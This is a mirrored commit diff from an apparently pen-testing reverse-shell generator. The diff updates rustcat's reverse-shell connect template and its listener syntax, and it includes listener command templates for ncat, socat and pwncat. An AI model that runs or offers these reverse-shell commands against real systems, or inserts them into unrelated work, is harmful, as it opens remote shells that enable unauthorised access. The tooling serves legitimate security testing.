mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-19 19:36:10 +00:00
commit
c6528c8404
@ -88,7 +88,7 @@ const reverseShellCommands = withCommandType(
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "rustcat",
|
"name": "rustcat",
|
||||||
"command": "rcat {ip} {port} -r {shell}",
|
"command": "rcat connect -s {shell} {ip} {port}",
|
||||||
"meta": ["linux", "mac"]
|
"meta": ["linux", "mac"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
@ -574,8 +574,7 @@ const rsgData = {
|
|||||||
['ncat.exe', 'ncat.exe -lvnp {port}'],
|
['ncat.exe', 'ncat.exe -lvnp {port}'],
|
||||||
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
|
||||||
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
['rlwrap + nc', 'rlwrap -cAr nc -lvnp {port}'],
|
||||||
['rustcat', 'rcat -lp {port}'],
|
['rustcat', 'rcat listen {port}'],
|
||||||
['rustcat + Command History', 'rcat -lHp {port}'],
|
|
||||||
['pwncat', 'python3 -m pwncat -lp {port}'],
|
['pwncat', 'python3 -m pwncat -lp {port}'],
|
||||||
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
['windows ConPty', 'stty raw -echo; (stty size; cat) | nc -lvnp {port}'],
|
||||||
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
|
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
|
||||||
|
Loading…
Reference in New Issue
Block a user